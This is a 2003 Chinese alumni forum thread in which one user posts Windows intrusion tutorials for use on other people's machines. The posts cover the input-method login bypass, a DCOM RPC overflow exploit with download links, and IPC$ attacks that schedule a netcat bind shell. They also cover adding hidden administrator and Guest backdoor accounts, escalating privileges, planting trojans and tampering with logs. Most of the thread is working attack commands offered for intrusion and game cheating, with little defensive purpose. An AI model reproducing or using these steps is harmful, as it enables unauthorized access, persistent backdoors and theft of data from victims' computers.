新年代 http://www.onefeel.net/bbs

湖南一师校友论坛是一师学子的网上家园。
共5 条记录, 每页显示 10 条, 页签: [1]

1楼
袁强 发表于:2003/12/27 8:05:45
先用端口扫描机扫描3389端口开放的机子 (注意:要国内的,只有简体中文版Windows有输入法漏洞) 然后用远程桌面登陆 然后你就可以按下面的方法入侵啦,哈哈   写在前面:其实偶很惭愧,因为,这只是利用输入法漏洞的一次本地 入侵,并不是远程控制,还请各位弄清,偶也只比菜鸟稍高那么 一点点,并不是什么高手。 在一个夜深人静的夜晚,我独自潜入U地带(这是**地的网控中心,在这简称 U地带),瞅准了一台机子,跑了过去,打开了电源,靠!!! 居然是98,不知能否用输入法漏洞,试试看吧。 机子启动完后,出现Windows输入密码的窗口,我赶快在用户名栏里切换微软 拼音输入法,因为有了它,才能利用输入法漏洞啊。 哈哈,找到啦,开始入侵喽!!!! 图片点击可在新窗口打开查看 看见上图画红圈的的帮助按钮了吗,点它,弹出帮助窗口。 在标题栏上单击鼠标右键,在弹开的菜单里选择“跳至URL”。 图片点击可在新窗口打开查看 在弹开的窗口中的“跳至该URL”栏里输入c:\windows\system(当然你也可 输别的盘的别的目录,但在你还不知这台机子上有多少分区是,还是 C盘比较保险)输入完后按确定,你就成功的入侵到system文件夹了。 图片点击可在新窗口打开查看 输入完后按确定,你就成功的入侵到system文件夹了。 图片点击可在新窗口打开查看 图片点击可在新窗口打开查看 当你在点击了system文件夹了的任何一个文件夹后(我点的是setup),Windows 会进入桌面,并会弹出一个错误对话框。 图片点击可在新窗口打开查看 虽然进入了桌面,但你却点不上桌面上的任何一个图标,这是因为 登陆密码的窗口还在,是它限止了你的活动,就想网吧了的万象或美萍一样。 图片点击可在新窗口打开查看 你会看见任务栏还可使用 图片点击可在新窗口打开查看 启动画笔看看,哈哈,一切正常。 图片点击可在新窗口打开查看 实际上,到这里入侵就算结束了,虽然桌面不能用但 你开可以用开始菜单进入我的电脑啊 双击附件。 图片点击可在新窗口打开查看 你就会进入c:\windows\Start Menu\Programs\附件 图片点击可在新窗口打开查看 再在地址栏里点我的电脑 图片点击可在新窗口打开查看 进入我的电脑 图片点击可在新窗口打开查看 可别把Windows的输入密码框望了,它还在啊,不知密码,点 取消吧,按完后,Windows居然有资源管理器的方式打开了c盘。 (不明白这是为什么,高手能否解释解释?) 图片点击可在新窗口打开查看 该干什么就干什么吧,可不要搞破坏啊。 如果机子能上网或接着宽带就更爽了,随便上个黑客网,down个冰河 下来,或其它的远程木马,运行它,以后你在网吧都能控制这台机子喽。 另外,现在象网控中心的机子大部分都打了C盘保护程序。木马不好运行。(因为 注册表是被保护的啊,木马开机就不能自动运行了) 但这也没关系,写个Autorun.inf(可以照着有自动播放光盘上的这个文件写) 文件放到别的盘的根目下(把木马最好放到别的盘下, 如果有两个以上的分区的话),用它来运行木马。但这只也能骗骗菜鸟。 输入法漏洞果真强大啊,我只在98的机子上实验,就已经成功入侵了啊
2楼
袁强 发表于:2003/12/27 8:37:26
晕,没仔细看,上面那个是win98的,现在谁还用那个啊 呵呵 我重新说明win2000的 先用端口扫描机扫描3389端口开放的机子 (注意:要国内的,只有简体中文版Windows有输入法漏洞) 然后用远程桌面登陆 然后你就可以按下面的方法入侵啦,哈哈 登陆远程桌面后按ctrl+alt键把输入法切换到全拼 如下图: 图片点击可在新窗口打开查看 如果输入法漏洞补上了“帮助”是灰色字体(这个已经补上了) 如果没有补上漏洞就是黑色字体 然后点帮助 弹出帮助窗口。 在标题栏上单击鼠标右键,在弹开的菜单里选择“跳至URL” 在弹开的窗口中的“跳至该URL”栏里输入c:\windows\system32 输入完后按确定,你就成功的入侵到system32文件夹了。 在system32文件夹找到net.exe文件 创建快捷方式 然后找到 快捷方式net.exe 在目标的c:\winnt\system32\net.exe后面空格后加上user 帐号 密码 /add 注:上面的语句是添加帐号的。帐号是你要创建的帐号。 比如我要加入gaozi的帐号,密码是gaozi520 目标后面的语句就变成了: c:\winnt\system32\net.exe user gaozi gaozi520 /add 然后确定,再双击运行 快捷方式net.exe 这样你的帐号就加入进去了 这还不行,因为还没有管理员权限 下一步是加入管理员权限,以 gaozi 帐号为例 再打开 快捷方式net.exe 在目标后面输入c:\winnt\system32\net.exe localgroup administrators gaozi /add 确定后再双击运行 快捷方式net.exe OK,帐号添加好了 关掉窗口,用你刚刚建立的帐号登陆就可以连接到他的桌面啦 后面的事你知道了吧 哈哈,下载传家宝外挂,狂挂机 传奇世界又多了一个高级玩家 HOHOHOHO 我刚睡醒,如果有什么地方打错了你再找我
3楼
袁强 发表于:2003/12/27 8:55:42
这篇我从黑白转来的,自己也没看懂,呵呵,等我下载工具试一下再告诉大家结果怎么样 ------------------------------------------------------------------------------------------------------------------ 记得从前看过一篇文章介绍如何快速获得3389肉机的文章,基本思路及步骤如下:先通过superscan等扫描端口的工具扫一段开启3389端口的主机,然后导出主机列表,再由x-scan扫描NT弱口令,配置强一点的字典,稍等一会儿,得到偌多弱口令,祭起终端连接,成功连接填入用户名就可以远程登陆控制了。留后门,删日志…… 其实得到开启3389服务的主机列表后,我们完全可以利用当前危害最大的“dcomrpc漏洞”添加一个管理员帐号,再用这个帐号轻松地登陆到远程终端,达到图形化的完全控制。 用到的工具有:superscan、x-scanV2.3、还有一个新增的x-scan的插件DComRpc.xpn,专门用来扫描存在DComRpc漏洞的机器。可以到这里下载http://www.xfocus.net/tools/200307/DComRpc.xpn,把它放到x-scan下plugin目录下。x-scan便有了扫描DComRpc漏洞的功能。当然你也可以下载专用的扫描器。不过经本人测试,这个插件还是相当好用的。还有主角远程 DCOM RPC 缓冲区溢出工具点击这里下载http://81.heibai.net:81/download/show.php?id=3951。 要开工了。用superscan得到主机列表,save成文本文件修改为一行一个IP的格式,这个过程略过不说了。打开加入了插件的x-scan,扫描参数中选“从文件获取主机列表”,选取刚才保存的文件。在扫描模块中只选择最后一项,也就是刚加进去的插件,Dcomrpc溢出漏洞。开始扫描吧,你会发现几乎是所有的机器都存在这个好玩而简单的漏洞。现在该用xpdcomrpc了,先看一下帮助吧: --------------------------------------------------------- - 远程 DCOM RPC 缓冲区溢出 - Original code by FlashSky and Benjurry - Rewritten by HDM - EXE 文件编译及修改:sagi http://www.hackerxfiles.net - Usage: xp - Targets: - 0 Windows 2000 SP0 (english) - 1 Windows 2000 SP0 (english2) - 2 Windows 2000 SP1 (english) - 3 Windows 2000 SP2 (english) - 4 Windows 2000 SP2 (english2) - 5 Windows 2000 SP3 (english) - 6 Windows 2000 SP3 (english2) - 7 Windows 2000 SP3 (english3) - 8 Windows 2000 SP4 (english) - 9 Windows XP SP0 (english) - 10 Windows XP SP1 (english) - 11 Windows XP SP1 (english2) - 12 Windows XP SP2 (english) - 13 Windows 2000 SP3 (chinese) - 14 Windows 2000 SP4 (chinese) - 15 Windows XP SP0 (chinese) - 16 Windows XP SP1 (chinese) - 17 Windows 2000 SP0 (japanese) - 18 Windows 2000 SP1 (japanese) - 19 Windows 2000 SP2 (japanese) - 20 Windows 2000 SP0-1 (big5) - 21 Windows 2000 SP3 (big5) - 22 Windows 2000 SP4 (big5) - 23 Windows XP SP0-1 (big5) - 24 Windows 2000 SP0 (korean) - 25 Windows 2000 SP1 (korean) - 26 Windows 2000 SP2 (korean) - 27 Windows 2000 SP4 (korean) 明白了吗?现在我们就可以这样了: xp 13 192.168.1.* 一段提示过后,看到跳出的shell了吗? c:\winnt\system32> 呵呵,到这一步,一切都好做了 c:\winnt\system32>net user admin hahaha /add 命令成功完成 c:\winnt\system32>net localgroup administrators admin /add 命令成功完成 好了,现在就可以用这个帐号admin进行3389远程控制了。 这种方法比较简单吧,要比起破解nt弱口令要主动一些,在此也是提出一种思路吧。从一开始的输入法漏洞开始,3389注定不能平安,愿大家都找到自己好用的肉机吧~
[此贴子已经被作者于2003-12-27 9:00:08编辑过]
4楼
袁强 发表于:2003/12/27 9:13:07
IPC入侵全攻略   IPC是Internet Process Connection的缩写,也就是远程网络连接。它是Windows NT及Windows 2000特有的一项功能,特点是在同一时间内,两个IP之间只允许建立一个连接。好了,废话少说,现在进入主题。 如何找到具有IPC漏洞的主机呢?以前我都是组合一个国外的扫描工具(名字我忘了)和KillUSA的LetMeIn,因为很多工作都是手工完成的,所以速度可想而知了。现在因为有了小榕的流光2000,所以找到这样的主机实在是太简单了,具体操作我就不说了,大家可以参考该软件的说明文档。 好了,假设我们已经找到了一台这样的主机,地址是139.223.200.xxx,管理员帐号是Administrator,密码是123456。进入命令行方式,正式开工。需要说明的是,以下操作都是在目标主机没有禁止远程IPC$连接和启动Schedule服务的理想情况下进行的。 F:\>net use \\139.223.200.xxx\ipc$ "123456" /user:"Administrator" 命令成功完成。 F:\>copy nc.exe \\139.223.200.xxx\admin$ 已复制 1 个文件。 F:\>net time \\139.223.200.xxx \\139.223.200.xxx 的当前时间是 2000/12/25 上午 10:25 在 \\139.223.200.xxx 的本地时间 (GMT - 07:00) 是 2000/12/25 上午10:35 命令成功完成。 F:\>at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe 新增加了一项作业,其作业 ID = 0 F:\>telnet 139.223.200.xxx 1234 上面的命令很简单,你只要参考一下net,at和nc的用法就可以了。这样,我们就登上了远程的主机。最理想的情况是这样的,但是,也许你会遇到目标主机的Schedule服务没有启动的情况,那么,at命令就不能用了,我们就需要增加以下步骤。 F:\>at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe 服务仍未启动。 F:\>netsvc \\139.223.200.xxx schedule /start Service is running on \\139.223.200.xxx 登上远程主机之后,我们可以做什么呢?这要视这个帐号的权限以及该主机的安全策略来决定。如果你的权限不够的话,可以试试下面的步骤。首先在本地执行下面的命令。 F:\>copy getadmin.exe \\139.223.200.xxx\admin$ 已复制 1 个文件。 F:\>copy gasys.dll \\139.223.200.xxx\admin$ 已复制 1 个文件。 其次,在远程主机运行下面的命令。 C:\WINNT\system32>getadmin 如果成功的话,你就是这台主机的管理员了,权限够大了吧?:-) 那么,现在我们能做什么呢?改主页?下载SAM数据库?都可以啦!方法有很多,我就不一一说了,具体方法可以参考相关教程。我一般对目标主机上的WORD文档和数据库比较感兴趣,呵呵。。。 其实,如果你在这台机子上面放个木马或者病毒什么的东东,做起事来更容易一些,但是我觉得如果你跟他没什么深仇大恨的话,还是不要这么做了,这样不好。 做完了你要做的事,不要忘了做个后门。 C:\WINNT\system32>net user Guest 30906766 net use Guest 30906766 The command completed successfully. C:\WINNT\system32>net localgroup administrators Guest /add net localgroup administrators Guest /add The command completed successfully. 这是个比较简单的后门,要想做的更好一些,可以象Linux那样,做出一套RootKits来,其实这样的东东目前已经有了,你只要拿来用就可以了。现在搞破坏真是简单多了,那么多的傻瓜工具任你用,哎!要想自保,不学点安全知识怎么行呢? 最后,我们得修理一下日志。虽然Redp0wer告诉我很少管理员会看NT的日志,但是我想修理一下还是有用的。NT的日志在什么地方呢?可以参考XUDI的文章。但是有一点要记住的是,日志只能修改,不能删除,否则就是自己把自己出卖了!:-)这方面的命令行工具也不少,你可以到一些国外的站点去看看。 其实有了这台主机,你还可以做的更多。
5楼
寒若冰 发表于:2004/1/11 3:23:48
我靠~~~~~ 我难得看,直接找个朋友挂就有达,哈哈~~~~ 好多级达??我一直没挂级达。 下学期的新衣服我都穿不了了,晕~~~~~~~~~~
共5 条记录, 每页显示 10 条, 页签: [1]


Powered By 湖南一师校友论坛
Processed in .09766 s, 5 queries.